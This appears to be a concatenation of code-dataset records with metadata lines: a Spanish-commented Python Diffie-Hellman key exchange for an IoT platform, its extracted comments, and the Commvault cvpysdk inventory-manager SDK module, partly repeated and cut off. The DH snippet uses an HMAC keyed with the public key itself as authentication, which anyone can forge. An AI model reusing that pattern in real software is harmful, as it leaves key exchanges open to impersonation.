Conversión a bytes y deserialización de parámetros dh_parameters_pem = dh_parameters.encode("utf-8") loaded_dh_params = load_pem_parameters(dh_parameters_pem) # 2. Conversión a bytes y deserialización de clave pública IoT public_key_IoT_pem = public_key_IoT.encode('utf-8') loaded_public_key_IoT = load_pem_public_key(public_key_IoT_pem) # Comprueba que la clave pública del IoT es correcta if (not isinstance(loaded_dh_params, dh.DHParameters) or not isinstance(loaded_public_key_IoT, dh.DHPublicKey)): sys.exit('Protocol error: Platform received a wrong message!') # Comprueba la autenticidad con la HMAC recibida h_IoT = hmac.HMAC(public_key_IoT_pem, hashes.SHA256()) h_IoT.update(b"Platform public key hash") h_IoT.verify(bytes.fromhex(pk_signature)) # 3. Plataforma genera sus propias claves privadas y públicas platform_private_key = loaded_dh_params.generate_private_key() platform_public_key = platform_private_key.public_key() # El KMS debe guardar esta clave pública junto con los parámetros y str_signature en la bbdd con id platform-HMACDH platform_pk_pem = platform_public_key.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo) str_platform_pk = platform_pk_pem.decode('utf-8') # HMAC h = hmac.HMAC(platform_pk_pem, hashes.SHA256()) h.update(b"Platform public key hash") signature = h.finalize() str_signature = signature.hex() shared_key = platform_private_key.exchange(loaded_public_key_IoT) # Devuelve la clave en string, el IoT debe enviar al KMS luego de nuevo esta clave para que la almacene return shared_key.hex(), {'generated-public-key': str_platform_pk, 'signature': str_signature, 'parameters': dh_parameters}
es
0.84531
# Key generation # Key derivation # Contraseña basada en key derivation # Data sensitiva para cifrar # Encriptación usando AES GCM # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) # Generate decryption key from passphrase and salt # Key generation # Key derivation # Contraseña basada en key derivation # Data sensitiva para cifrar # Encriptación usando AES GCM # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) # Key derivation # Generar decryption key con la contraseña y salt # Validar MAC y descifrar, si la validación MAC falla, ValueError exception se va a mostrar # Input para shared key Platform: ID clave pública IoT # Returns shared key IoT # Plataforma genera su clave pública y privada (y la pública se almacena en la bbdd para el IoT) # 1. Obtener clave pública en string de la bd y pasar a objeto key # Returns shared key platform # A la API le llega el id de la clave y de ahí saca el string de parámetros y de la public key del IoT # En este punto, el KMS ya tiene los dh_parameters y la clave pública en string y debe convertirlo al objeto original # 1. Conversión a bytes y deserialización de parámetros # 2. Conversión a bytes y deserialización de clave pública IoT # Comprueba que la clave pública del IoT es correcta # Comprueba la autenticidad con la HMAC recibida # 3. Plataforma genera sus propias claves privadas y públicas # El KMS debe guardar esta clave pública junto con los parámetros y str_signature en la bbdd con id platform-HMACDH # HMAC # Devuelve la clave en string, el IoT debe enviar al KMS luego de nuevo esta clave para que la almacene
1.851135
2
cvpysdk/activateapps/inventory_manager.py
CommvaultEngg/cvpysdk
35
6623567
# -*- coding: utf-8 -*- # -------------------------------------------------------------------------- # Copyright Commvault Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # -------------------------------------------------------------------------- """Main file for performing operations on inventory manager app under Activate. Inventories, Inventory, Assets & Asset are the four classes defined in this file Inventories: class for representing all inventories in the commcell Inventory: class for representing a single inventory in the commcell Assets: class for representing all assets in an inventory Asset: class to represent single asset in an inventory Inventories: __init__() -- initialise object of the Inventories class _get_inventories() -- Gets all inventories in the commcell _response_not_success() -- parses through the exception response, and raises SDKException refresh() -- refresh the Inventories from the commcell get_properties() -- returns the properties for given inventory name has_inventory() -- Checks if a given inventory name exists in the commcell or not get() -- returns the Inventory class object for given inventory name add() -- add inventory to the commcell delete() -- delete inventory from the commcell Inventory: __init__() -- initialise object of the Inventory class _response_not_success() -- parses through the exception response, and raises SDKException _get_inventory_properties() -- Gets all the properties of this inventory _get_schedule_object() 
-- returns the schedule class object associated to this inventory _get_data_source_handler_object() -- returns the datasource and default handler object for this inventory refresh() -- refresh the properties of the inventory get_assets() -- returns the Assets class object for this inventory share() -- shares inventory with other user or user group start_collection() -- starts collection job on this inventory get_inventory_data() -- returns data from inventory Inventory Attributes ----------------- **properties** -- returns properties of the inventory **index_server_name** -- returns the index server name associated with this inventory **_index_server_cloud_id** -- returns the index server cloudid associated with this inventory **inventory_name** -- returns the inventory name **inventory_id** -- returns the inventory id **security_associations** -- returns the security associations blob of this inventory **schedule** -- returns the schedule object associated with this inventory **data_source** -- returns the DataSource object associated with this inventory **handler** -- returns the default handler object for this inventory Assets: __init__() -- initialise object of the Assets class refresh() -- refresh the assets associated with inventory add() -- adds asset to the inventory get() -- returns the instance of Asset class based on given asset name has_asset() -- returns whether given asset exists or not in inventory delete() -- deletes the asset from the inventory _get_assets_properties() -- returns the assets properties _response_not_success() -- parses through the exception response, and raises SDKException Assets Attributes: ---------------- **assets** -- returns the assets details as json Asset: __init__() -- initialise object of the Asset class _get_properties() -- returns the properties of the asset refresh() -- refresh the asset associated with inventory start_collection() -- starts collection job on this asset get_job_history() -- returns the job history 
details of this asset get_job_status() -- returns the job status details of this asset get_asset_prop() -- returns the asset property value for the given property name Asset Attributes: ----------------- **asset_id** -- returns the id of asset **asset_name** -- returns the name of asset **asset_type** -- returns the type of asset **crawl_start_time** -- returns the last crawl start time of asset **asset_props** -- returns the properties(name/value pair) of asset **asset_status** -- returns the status of asset **inventory_id** -- returns the inventory id of this asset """ import copy from ..activateapps.ediscovery_utils import EdiscoveryClientOperations from ..activateapps.constants import InventoryConstants from ..schedules import Schedules from ..exception import SDKException class Inventories(): """Class for representing all inventories in the commcell.""" def __init__(self, commcell_object): """Initializes an instance of the Inventories class. Args: commcell_object (object) -- instance of the commcell class Returns: object - instance of the Inventories class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._cvpysdk_object = commcell_object._cvpysdk_object self._services = commcell_object._services self._inventories = None self._API_INVENTORIES = self._services['EDISCOVERY_INVENTORIES'] self._API_DELETE_INVENTORY = self._services['EDISCOVERY_INVENTORY'] self.refresh() def _response_not_success(self, response): """Helper function to raise an exception when reponse status is not 200 (OK). 
Args: response (object) -- response class object, received upon running an API request, using the `requests` python package """ raise SDKException('Response', '101', self._update_response_(response.text)) def _get_inventories(self): """Gets all inventories from the commcell Args: None Return: list(dict) -- list Containing inventory details dict Raises: SDKException: if response is empty if response is not success """ output = {} flag, response = self._cvpysdk_object.make_request( 'GET', self._API_INVENTORIES ) if flag: if response.json() and 'inventoryList' in response.json(): inventories = response.json()['inventoryList'] for inventory in inventories: output[inventory['inventoryName'].lower()] = inventory return output raise SDKException('Inventory', '103') self._response_not_success(response) def add(self, inventory_name, index_server, name_server=None): """Adds inventory to the commcell with given inputs Args: inventory_name (str) -- Name of the inventory index_server (str) -- Index server name name_server (list) -- Name server assets which needs to be added to inventory Returns: object -- Instance of Inventory Class Raises: SDKException: if input data type is not valid if failed to add inventory if Index Server doesn't exists in commcell """ if not isinstance(inventory_name, str) or not isinstance(index_server, str): raise SDKException('Inventory', '101') req_json = copy.deepcopy(InventoryConstants.INVENTORY_ADD_REQUEST_JSON) if name_server: asset_json = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON) for server in name_server: asset_json['name'] = server req_json['assets'].append(asset_json) req_json['inventoryName'] = inventory_name if not self._commcell_object.index_servers.has(index_server): raise SDKException('Inventory', '102', "Given index server name not exists on this commcell") index_server_obj = self._commcell_object.index_servers.get(index_server) req_json['analyticsEngineCloud']['cloudId'] = index_server_obj.cloud_id 
req_json['analyticsEngineCloud']['cloudDisplayName'] = index_server_obj.cloud_name flag, response = self._cvpysdk_object.make_request( 'POST', self._API_INVENTORIES, req_json ) if flag: if response.json() and 'errorResp' in response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to create inventory with error [{err_resp['errorMessage']}]") elif 'inventoryList' in response.json(): inventory = response.json()['inventoryList'][0] inventory_id = inventory['inventoryId'] self.refresh() return Inventory(self._commcell_object, inventory_name, inventory_id) raise SDKException('Inventory', '102', f"Failed to create inventory with response - {response.json()}") raise SDKException('Inventory', '105') self._response_not_success(response) def delete(self, inventory_name): """Deletes the inventory from the commcell Args: inventory_name (str) -- Inventory name to be deleted Returns: None Raises: SDKException: if unable to find inventory if failed to delete inventory if input type is not valid """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') if not self.has_inventory(inventory_name): raise SDKException('Inventory', '106') flag, response = self._cvpysdk_object.make_request( 'DELETE', self._API_DELETE_INVENTORY % self._inventories[inventory_name.lower()]['inventoryId'] ) if flag: if response.json() and 'errorResp' in response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to Delete inventory with error [{err_resp['errorMessage']}]") self.refresh() else: raise SDKException('Inventory', '107') else: self._response_not_success(response) def refresh(self): """Refresh the inventories associated with the commcell.""" self._inventories = self._get_inventories() def get_properties(self, inventory_name): """Returns a properties of the specified 
Inventory Args: inventory_name (str) -- name of the inventory Returns: dict - properties for the given inventory name """ return self._inventories[inventory_name.lower()] def has_inventory(self, inventory_name): """Checks if a inventory exists in the commcell with the input name. Args: inventory_name (str) -- name of the inventory Returns: bool - boolean output to specify whether the inventory exists in the commcell or not Raises: SDKException: if type of the inventory name argument is not string """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') return self._inventories and inventory_name.lower() in map(str.lower, self._inventories) def get(self, inventory_name): """Returns a Inventory object for the given inventory name. Args: inventory_name (str) -- name of the inventory Returns: obj -- Object of Inventory class Raises: SDKException: if inventory doesn't exists in commcell if inventory_name is not of type string """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') if self.has_inventory(inventory_name): inventory_id = self._inventories[inventory_name.lower()]['inventoryId'] return Inventory(self._commcell_object, inventory_name, inventory_id) raise SDKException('Inventory', '106') class Inventory(): """Class for performing operations on a single inventory""" def __init__(self, commcell_object, inventory_name, inventory_id=None): """Initialize an object of the Inventory class. 
Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Inventory class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._services = commcell_object._services self._cvpysdk_obj = self._commcell_object._cvpysdk_object self._inventory_id = None self._inventory_name = inventory_name self._inventory_props = None self._index_server_name = None self._index_server_cloud_id = None self._security_associations = None self._schedule = None self._data_source = None self._handler = None self._API_GET_INVENTORY_DETAILS = self._services['EDISCOVERY_INVENTORY'] self._API_SECURITY = self._services['SECURITY_ASSOCIATION'] self._API_SECURITY_ENTITY = self._services['ENTITY_SECURITY_ASSOCIATION'] self._API_GET_DEFAULT_HANDLER = self._services['EDISCOVERY_GET_DEFAULT_HANDLER'] if not inventory_id: self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id else: self._inventory_id = inventory_id self.refresh() self._ediscovery_client_obj = EdiscoveryClientOperations(class_object=self, commcell_object=commcell_object) def _response_not_success(self, response): """Helper function to raise an exception when reponse status is not 200 (OK). 
Args: response (object) -- response class object, received upon running an API request, using the `requests` python package """ raise SDKException('Response', '101', self._update_response_(response.text)) def _get_inventory_properties(self): """ Get inventory properties from the commcell Args: None Returns: dict -- Properties of inventory """ flag, response = self._cvpysdk_obj.make_request( 'GET', self._API_GET_INVENTORY_DETAILS % self._inventory_id ) if flag: if response.json() and 'inventoryList' in response.json(): inventory_props = response.json()['inventoryList'][0] self._index_server_name = inventory_props['analyticsEngineCloud']['cloudDisplayName'] self._index_server_cloud_id = inventory_props['analyticsEngineCloud']['cloudId'] self._inventory_name = inventory_props['inventoryName'] self._security_associations = inventory_props['securityAssociation']['associations'] return inventory_props raise SDKException('Inventory', '104') self._response_not_success(response) def refresh(self): """Refresh the inventory details for associated object""" self._inventory_props = self._get_inventory_properties() self._schedule = self._get_schedule_object() self._data_source, self._handler = self._get_data_source_handler_object() def get_assets(self): """Returns the Assets class instance for this inventory Args: None Returns: object -- Instance of Assets class """ return Assets(self._commcell_object, self.inventory_name, self.inventory_id) def start_collection(self): """Starts collection job on this inventory Args: None Return: None Raises: SDKException: if failed to start collection job """ return self._ediscovery_client_obj.start_job() def share(self, user_or_group_name, allow_edit_permission=False, is_user=True, ops_type=1): """Shares inventory with given user or user group in commcell Args: user_or_group_name (str) -- Name of user or group is_user (bool) -- Denotes whether this is user or group name default : True(User) allow_edit_permission (bool) -- whether to give edit 
permission or not to user or group ops_type (int) -- Operation type Default : 1 (Add) Supported : 1 (Add) 3 (Delete) Returns: None Raises: SDKException: if unable to update security associations if response is empty or not success """ if not isinstance(user_or_group_name, str): raise SDKException('Inventory', '101') request_json = copy.deepcopy(InventoryConstants.INVENTORY_SHARE_REQUEST_JSON) external_user = False association_response = None if ops_type == 1 and len(self.security_associations) > 1: association_request_json = copy.deepcopy(InventoryConstants.INVENTORY_SHARE_REQUEST_JSON) del association_request_json['securityAssociations'] association_request_json['entityAssociated']['entity'][0]['seaDataSourceId'] = int(self.inventory_id) # get security blob for this data source type entity - 132 flag, response = self._cvpysdk_obj.make_request( 'GET', self._API_SECURITY_ENTITY % (132, int(self.inventory_id)), association_request_json ) if flag: if response.json() and 'securityAssociations' in response.json(): association_response = response.json( )['securityAssociations'][0]['securityAssociations']['associations'] else: raise SDKException('Inventory', '102', 'Failed to get existing security associations') else: response_string = self._commcell_object._update_response_(response.text) raise SDKException('Response', '101', response_string) if '\\' in user_or_group_name: external_user = True if is_user: user_obj = self._commcell_object.users.get(user_or_group_name) user_id = user_obj.user_id request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userId'] = int(user_id) request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "13" request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userName'] = user_or_group_name elif external_user: request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['groupId'] = 0 
request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "62" request_json['securityAssociations']['associations'][0]['userOrGroup'][0][ 'externalGroupName'] = user_or_group_name else: grp_obj = self._commcell_object.user_groups.get(user_or_group_name) grp_id = grp_obj.user_group_id request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userGroupId'] = int(grp_id) request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "15" request_json['securityAssociations']['associations'][0]['userOrGroup'][0][ 'userGroupName'] = user_or_group_name request_json['entityAssociated']['entity'][0]['seaDataSourceId'] = self.inventory_id request_json['securityAssociations']['associationsOperationType'] = ops_type if allow_edit_permission: request_json['securityAssociations']['associations'][0]['properties']['categoryPermission']['categoriesPermissionList'].append( InventoryConstants.EDIT_CATEGORY_PERMISSION) # Associate existing associations to the request if ops_type == 1 and len(self.security_associations) > 1: request_json['securityAssociations']['associations'].extend(association_response) flag, response = self._cvpysdk_obj.make_request( 'POST', self._API_SECURITY, request_json ) if flag: if response.json() and 'response' in response.json(): response_json = response.json()['response'][0] error_code = response_json['errorCode'] if error_code != 0: error_message = response_json['errorString'] raise SDKException( 'Inventory', '102', error_message) # update association list by refreshing inventory self.refresh() else: raise SDKException('Inventory', '111') else: response_string = self._commcell_object._update_response_(response.text) raise SDKException('Response', '101', response_string) def _get_data_source_handler_object(self): """returns the data source and handler object associated with this inventory Args: None Returns: obj,obj -- Instance of DataSource object,Instance of Handler object Raises: 
SDKException: if failed to get datasource or handler details """ flag, response = self._cvpysdk_obj.make_request( 'GET', self._API_GET_DEFAULT_HANDLER % self.inventory_id) if flag: if response.json() and 'handlerInfos' in response.json(): handler_list = response.json()['handlerInfos'] if not isinstance(handler_list, list): raise SDKException('Inventory', '102', "Failed to get Datasource/Handler details") handler_details = handler_list[0] ds_name = handler_details['dataSourceName'] handler_name = handler_details['handlerName'] ds_obj = self._commcell_object.datacube.datasources.get(ds_name) handler_obj = ds_obj.ds_handlers.get(handler_name) return ds_obj, handler_obj raise SDKException('Inventory', '102', 'Unknown response while fetching datasource details') response_string = self._commcell_object._update_response_(response.text) raise SDKException('Response', '101', response_string) def _get_schedule_object(self): """Returns the schedule class object of schedule associated to this inventory Args: None Returns: object -- Instance of Schedule class Raises: SDKException: if failed to find schedule """ return Schedules(self).get() def get_inventory_data(self, handler_filter=""): """ Executes handler for fetching data from inventory Args: handler_filter (str) -- Filter which needs to applied for handler execution Returns: dict -- Dictionary of values fetched from handler execution Raises: SDKExpception: if error in fetching handler data if input is not valid """ if not isinstance(handler_filter, str): raise SDKException('Inventory', '101') if not self._handler: raise SDKException('Inventory', '102', 'No handler object initialised') return self._handler.get_handler_data(handler_filter=handler_filter) @property def properties(self): """Returns the properties of this inventory as dict""" return self._inventory_props @property def index_server_name(self): """Returns the index server name associated with this inventory""" return self._index_server_name @property def 
index_server_cloud_id(self): """Returns the index server id associated with this inventory""" return self._index_server_cloud_id @property def inventory_id(self): """Returns the inventory id associated with this inventory""" return self._inventory_id @property def inventory_name(self): """Returns the inventory name associated with this inventory""" return self._inventory_name @property def security_associations(self): """Returns the security blob associated with this inventory""" return self._security_associations @property def schedule(self): """Returns the schedule class object for schedule associated with this inventory""" return self._schedule @property def data_source(self): """Returns the DataSource class object for datasource associated with this inventory""" return self._data_source @property def handler(self): """Returns the Handler class object for default handler associated with this inventory""" return self._handler class Assets(): """Class to represent all assets in an inventory""" def __init__(self, commcell_object, inventory_name, inventory_id=None): """Initialize an object of the Assets class. 
Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Assets class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._services = commcell_object._services self._cvpysdk_obj = self._commcell_object._cvpysdk_object self._inventory_id = None self._inventory_name = inventory_name if not inventory_id: self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id else: self._inventory_id = inventory_id self._assets = None self._API_INVENTORIES = self._services['EDISCOVERY_INVENTORIES'] self._API_ASSETS = self._services['EDISCOVERY_ASSETS'] self.refresh() def _get_assets_properties(self): """gets the assets properties from inventory Args: None Returns: dict -- containing asset properties """ inv_mgr = self._commcell_object.activate.inventory_manager() inv_obj = inv_mgr.get(self._inventory_name) inv_obj.refresh() assets = {} for asset in inv_obj.properties['assets']: name = asset['name'].lower() assets[name] = asset return assets def refresh(self): """Refresh the assets details associated with this inventory""" self._assets = self._get_assets_properties() def _response_not_success(self, response): """Helper function to raise an exception when reponse status is not 200 (OK). 
        Args:
            response    (object)    --  response class object,
                received upon running an API request, using the `requests` python package

        """
        raise SDKException('Response', '101', self._update_response_(response.text))

    def has_asset(self, asset_name):
        """Checks whether given asset exists in inventory or not

            Args:
                asset_name      (str)   --  Name of the asset

            Returns:
                bool    --  true if asset exists else false

        """
        # _assets keys are stored lower-cased by refresh(), so lookup is case-insensitive
        return self._assets and asset_name.lower() in self._assets

    def get(self, asset_name):
        """Returns the asset object

            Args:
                asset_name      (str)   --  Name of the asset

            Returns:
                object  --  Instance of Asset class

            Raises:
                SDKException:

                    if input is not valid

                    if asset doesn't exists in inventory

        """
        if not isinstance(asset_name, str):
            raise SDKException('Inventory', '101')
        if not self.has_asset(asset_name):
            raise SDKException('Inventory', '109')
        return Asset(self._commcell_object, self._inventory_name, asset_name, self._inventory_id)

    def add(self, asset_name, asset_type=InventoryConstants.AssetType.NAME_SERVER, **kwargs):
        """Adds asset to the inventory

            Args:
                asset_name      (str)   --  Name of the asset

                asset_type      (Enum)  --  type of asset
                        (Refer to InventoryConstants.AssetType class)

            Kwargs (for FILE SERVER type asset):

                fqdn            --  File server FQDN

                os              --  File Server OS type

                ip              --  File server IP

                country_code    --  Country code (ISO 3166 2-letter code)

                country_name    --  Country name

                domain          --  File Server Domain name (optional)

            Returns:
                object  --  Instance of Asset class

            Raises:
                SDKException:

                    if input is not valid

                    if failed to add asset to inventory

        """
        if not isinstance(asset_name, str) or not isinstance(asset_type, InventoryConstants.AssetType):
            raise SDKException('Inventory', '101')
        request_json = copy.deepcopy(InventoryConstants.ASSET_ADD_TO_INVENTORY_JSON)
        request_json['inventoryId'] = int(self._inventory_id)
        asset_json = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON)
        asset_json['name'] = asset_name
        asset_json['type'] = asset_type.value
        property_json = copy.deepcopy(InventoryConstants.ASSET_PROPERTY_JSON)
        # file-server assets carry extra name/value properties; name-server assets do not
        if asset_type.value == InventoryConstants.AssetType.FILE_SERVER.value:
            for prop in InventoryConstants.ASSET_FILE_SERVER_PROPERTY:
                prop_name = InventoryConstants.FIELD_PROPS_MAPPING[prop]
                default_value = ""
                if prop_name not in kwargs:
                    # if domain is not passed, then form domain from fqdn
                    # NOTE(review): assumes the 'fqdn' kwarg is present and dotted — verify callers
                    if prop == InventoryConstants.FIELD_PROPERTY_DOMAIN:
                        default_value = kwargs.get(InventoryConstants.KWARGS_FQDN)
                        default_value = default_value.split(".", 1)[1]
                    # always use asset name as file server name
                    if prop == InventoryConstants.FIELD_PROPERTY_NAME:
                        default_value = asset_name
                prop_json = copy.deepcopy(InventoryConstants.ASSET_PROPERTY_NAME_VALUE_PAIR_JSON)
                prop_json['name'] = prop
                prop_json['value'] = kwargs.get(prop_name, default_value)
                property_json['propertyValues']['nameValues'].append(prop_json)
            # merge the collected properties into the asset entry
            asset_json.update(property_json)
        request_json['assets'].append(asset_json)
        flag, response = self._cvpysdk_obj.make_request(
            'PUT', self._API_INVENTORIES, request_json)
        if flag:
            if response.json() and 'errorResp' in response.json():
                err_resp = response.json()['errorResp']
                if 'errorCode' in err_resp and err_resp['errorCode'] != 0:
                    raise SDKException(
                        'Inventory', '102',
                        f"Failed to add asset to inventory with error [{err_resp['errorMessage']}]")
                self.refresh()
                return Asset(self._commcell_object, self._inventory_name, asset_name, self._inventory_id)
            raise SDKException('Inventory', '108')
        self._response_not_success(response)

    def delete(self, asset_name):
        """Delete the asset from the inventory

            Args:
                asset_name      (str)   --  Name of the asset

            Returns:
                None

            Raises:
                SDKException:

                    if input is not valid

                    if failed to delete the asset

                    if unable to find this asset in inventory

        """
        if not isinstance(asset_name, str):
            raise SDKException('Inventory', '101')
        if not self.has_asset(asset_name):
            raise SDKException('Inventory', '109')
        request_json = copy.deepcopy(InventoryConstants.ASSET_DELETE_FROM_INVENTORY_JSON)
        request_json['inventoryId'] = int(self._inventory_id)
        if 'assetId' in self._assets[asset_name.lower()]:
            request_json['assets'].append({'assetId': self._assets[asset_name.lower()]['assetId']})
        else:
            req = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON)
            asset_obj = self.get(asset_name)
            asset_type = asset_obj.asset_type
            # for file server asset, asset name will not be display name in backend delete request. so fetch fqdn
            req['name'] = asset_obj.get_asset_prop(prop_name=InventoryConstants.FIELD_PROPERTY_DNSHOST)
            req['type'] = asset_type
            request_json['assets'].append(req)
        flag, response = self._cvpysdk_obj.make_request(
            'PUT', self._API_ASSETS % self._inventory_id, request_json)
        if flag:
            if response.json():
                # NOTE(review): 'errorResp' is accessed unguarded here, unlike add() — confirm
                # the backend always includes it on a 200 delete response
                err_resp = response.json()['errorResp']
                if 'errorCode' in err_resp and err_resp['errorCode'] != 0:
                    raise SDKException(
                        'Inventory', '102',
                        f"Failed to delete asset from inventory with error [{err_resp['errorMessage']}]")
                self.refresh()
                return
            raise SDKException('Inventory', '110')
        self._response_not_success(response)

    @property
    def assets(self):
        """Returns the assets details associated with this inventory"""
        return self._assets


class Asset():
    """Class to represent single asset in an inventory"""

    def __init__(self, commcell_object, inventory_name, asset_name, inventory_id=None):
        """Initialize an object of the Asset class.

            Args:
                commcell_object     (object)    --  instance of the commcell class

                inventory_name      (str)       --  name of the Inventory

                asset_name          (str)       --  Name of the asset

                inventory_id        (str)       --  id of Inventory

                    default: None

            Returns:
                object  -   instance of the Asset class

        """
        self._commcell_object = commcell_object
        self._update_response_ = commcell_object._update_response_
        self._services = commcell_object._services
        self._cvpysdk_obj = self._commcell_object._cvpysdk_object
        self._inventory_id = None
        self._inventory_name = inventory_name
        # resolve inventory id via inventory manager when the caller did not pass one
        if not inventory_id:
            self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id
        else:
            self._inventory_id = inventory_id
        self._asset_name = asset_name
        self._asset_props = None
        self._asset_id = None
        self._crawl_start_time = None
        self._asset_type = None
        self._asset_status = None
        self._asset_name_values_props = None
        self.refresh()
        self._ediscovery_client_obj = EdiscoveryClientOperations(class_object=self, commcell_object=commcell_object)

    def _get_properties(self):
        """Returns the properties of this asset

            Args:
                None

            Returns:
                dict    --  Containing properties of asset (empty dict when the
                            asset is not found in the refreshed inventory)

        """
        inv_mgr = self._commcell_object.activate.inventory_manager()
        inv_obj = inv_mgr.get(self._inventory_name)
        # force a fresh fetch of the inventory's asset list before scanning it
        inv_obj.get_assets().refresh()
        for asset in inv_obj.properties['assets']:
            if asset['name'].lower() == self._asset_name.lower():
                # for file server, we will not have asset id & crawl times
                self._asset_id = asset.get('assetId', 0)
                self._crawl_start_time = asset.get('crawlStartTime', 0)
                self._asset_type = asset.get('type', 0)
                self._asset_status = asset['status']
                self._asset_name = asset['name']
                self._asset_name_values_props = asset['propertyValues']['nameValues']
                return asset
        return {}

    def refresh(self):
        """Refresh the asset details associated with this"""
        self._asset_props = self._get_properties()

    def get_job_history(self):
        """Returns the job history details of this asset

            Args:
                None

            Returns:
                list(dict)  --  containing job history details

            Raises:
                SDKException:

                    if failed to get job history

                    if asset is not supported for this operation

        """
        # job history is exposed only for Name Server assets
        if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value:
            raise SDKException('Inventory', '102', "Not supported other than Name Server asset type")
        return self._ediscovery_client_obj.get_job_history()

    def get_job_status(self):
        """Returns the job status details of this asset

            Args:
                None

            Returns:
                dict    --  containing job status details

            Raises:
                SDKException:

                    if failed to get job status

                    if asset is not supported for this operation

        """
        if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value:
            raise SDKException('Inventory', '102', "Not supported other than Name Server asset type")
        return self._ediscovery_client_obj.get_job_status()

    def start_collection(self, wait_for_job=False, wait_time=60):
        """Starts collection job on this asset

            Args:
                wait_for_job    (bool)  --  specifies whether to wait for job to complete or not

                wait_time       (int)   --  time interval to wait for job completion in Mins
                                                Default : 60Mins

            Returns:
                None

            Raises:
                SDKException:

                    if failed to start collection job

                    if asset is not supported for this operation

        """
        if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value:
            raise SDKException('Inventory', '102', "Not supported other than Name Server asset type")
        return self._ediscovery_client_obj.start_job(wait_for_job=wait_for_job, wait_time=wait_time)

    def get_asset_prop(self, prop_name):
        """returns the property value for given property name for this asset

            Args:
                prop_name       (str)   --  Name of the property

            Returns:
                str     --  Value of the property ("" when the property is absent)

        """
        for prop in self._asset_name_values_props:
            name = prop['name']
            if name == prop_name:
                return prop['value']
        return ""

    @property
    def asset_id(self):
        """Returns the asset id with this asset"""
        return self._asset_id

    @property
    def asset_name(self):
        """Returns the asset name with this asset"""
        return self._asset_name

    @property
    def crawl_start_time(self):
        """Returns the crawl start time with this asset"""
        return self._crawl_start_time

    @property
    def asset_type(self):
        """Returns the asset type for this asset"""
        return self._asset_type

    @property
    def asset_status(self):
        """Returns the asset status for this asset"""
        return self._asset_status

    @property
    def asset_props(self):
        """Returns the property values for this asset"""
        return self._asset_name_values_props

    @property
    def inventory_id(self):
        """Returns the inventory id for this asset"""
        return self._inventory_id
# -*- coding: utf-8 -*-

# --------------------------------------------------------------------------
# Copyright Commvault Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------

"""Main file for performing operations on inventory manager app under Activate.

Inventories, Inventory, Assets & Asset are the four classes defined in this file

Inventories:    class for representing all inventories in the commcell

Inventory:      class for representing a single inventory in the commcell

Assets:         class for representing all assets in an inventory

Asset:          class to represent single asset in an inventory

Inventories:

    __init__()                          --  initialise object of the Inventories class

    _get_inventories()                  --  Gets all inventories in the commcell

    _response_not_success()             --  parses through the exception response, and raises SDKException

    refresh()                           --  refresh the Inventories from the commcell

    get_properties()                    --  returns the properties for given inventory name

    has_inventory()                     --  Checks if a given inventory name exists in the commcell or not

    get()                               --  returns the Inventory class object for given inventory name

    add()                               --  add inventory to the commcell

    delete()                            --  delete inventory from the commcell

Inventory:

    __init__()                          --  initialise object of the Inventory class

    _response_not_success()             --  parses through the exception response, and raises SDKException

    _get_inventory_properties()         --  Gets all the properties of this inventory

    _get_schedule_object()              --  returns the schedule class object associated to this inventory

    _get_data_source_handler_object()   --  returns the datasource and default handler object for this inventory

    refresh()                           --  refresh the properties of the inventory

    get_assets()                        --  returns the Assets class object for this inventory

    share()                             --  shares inventory with other user or user group

    start_collection()                  --  starts collection job on this inventory

    get_inventory_data()                --  returns data from inventory

Inventory Attributes
--------------------

    **properties**              --  returns properties of the inventory

